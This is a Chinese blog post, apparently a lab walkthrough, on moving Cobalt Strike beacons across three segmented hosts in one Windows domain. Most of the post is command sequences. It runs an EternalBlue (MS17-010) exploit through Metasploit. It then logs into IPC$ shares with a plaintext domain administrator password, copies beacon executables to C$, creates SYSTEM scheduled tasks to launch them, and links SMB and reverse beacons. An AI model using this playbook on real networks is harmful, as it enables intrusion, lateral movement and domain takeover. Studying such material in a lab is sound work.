CS_上线三层跨网段机器(完整过程还原)

以前讲过用cs_smb_beacon上线不出网机器,但是真实的网络拓扑肯定不止这么一层的网络!

所以我就来搭建一个复杂一点的网络环境!!

当然了,这三台电脑之间都是不同的网段,(但是同属于一个域环境!!)

来看网络拓扑!!

1.先拿下web机器

这里拿下的方式有很多种,那么我就先讲最简单的一种,没错又是永恒之蓝,但是现实生活中肯定是不会将一台存在永恒之蓝的win7作为web机器的!!

kali:

bash 复制代码
msfconsole
bash 复制代码
search ms17-010
bash 复制代码
use 0
bash 复制代码
set rhost 192.168.43.131
exploit

成功拿下shell

于是先上线到cs!! 监听器,木马这些我就不多说原理了

记得选上这个没有(stagless)的木马

然后上传,点击上线,可谓是一气呵成!!!

这样,我们就上线了第一台web机器!!!

2.拿下二层不出网DC

这里我选择生成的监听器还是smb的beacon

然后木马那里就要选择带有stageless的那个木马了,然后先上传到web机器!!!

然后就是我们熟悉的颁布计划任务了!!!

bash 复制代码
net use \\192.168.2.129\ipc$  "hongrisec@2024" /user:god\administrator

shell net use 

shell copy beacon.exe \\192.168.2.129\c$

shell schtasks /create /s 192.168.2.129 /tn beacon /sc onstart /tr c:\beacon.exe /ru system /f

shell schtasks /run /s 192.168.2.129 /i /tn "beacon"

link 192.168.2.129

这样就能上线了第二层不出网的域控!!!

3.上线第三层不出网Win10

这里的操作和前面的操作不一样,前面的连接都是用的正向连接,现在我们来玩一下反向连接

先在cs执行以下操作,选择转发上线!!!

然后你生成一个监听器就是记住你的端口别冲突了!!

然后就是生成以这个为监听器的木马,并且颁布计划任务了

bash 复制代码
net use \\192.168.1.130\ipc$  "hongrisec@2024" /user:god\administrator

shell net use 

shell copy last.exe \\192.168.1.130\c$

shell schtasks /create /s 192.168.1.130 /tn last /sc onstart /tr c:\last.exe /ru system /f

shell schtasks /run /s 192.168.1.130 /i /tn "last"
 
link 192.168.1.130

最后是能看见是能够以last.exe去上线这个木马的!!!

可以看见是能够执行命令的

相关推荐
xiangshangdemayi1 个月前
vue3环境下mapbox本地部署极速入门
部署·矢量切片·mapbox·内网·离线·天地图
ccc_9wy1 个月前
pikachu靶场SSRF-file_get_content测试报告
网络安全·内网·ssrf·web漏洞·中间人攻击·filegetcontents·file协议
Splashtop高性能远程控制软件2 个月前
远程桌面内网穿透是什么?有什么作用?
内网穿透·远程控制·远程桌面·内网
俱会一处3 个月前
用openssl 创建自签名证书用于内网HTTPS
https·openssl·内网·局域网
hgdlip3 个月前
ip地址是公网还是内网?内网电脑ip地址在哪看
服务器·网络·电脑·负载均衡·ip地址·内网
SuperherRo4 个月前
内网对抗-基石框架篇&域树林&域森林架构&信任关系&多域成员层级&信息收集&环境搭建
内网·域树·域森林
SuperherRo4 个月前
内网对抗-代理通讯篇&不出网或不可达&SockS全协议&规则配置&C2正反向上线&解决方案
代理·socks·内网·c2上线·正反向
SuperherRo4 个月前
内网对抗-基石框架篇&单域架构&域内应用控制&成员组成&用户策略&信息收集&环境搭建
架构·内网·单域
想拿 0day 的脚步小子5 个月前
应用程序提权
安全·渗透测试·提权·内网
EasyCVR5 个月前
如何在纯内网环境下,将EasyCVR视频汇聚网关通过4G与第三方公网云平台级联?
音视频·视频编解码·视频汇聚·4g·内网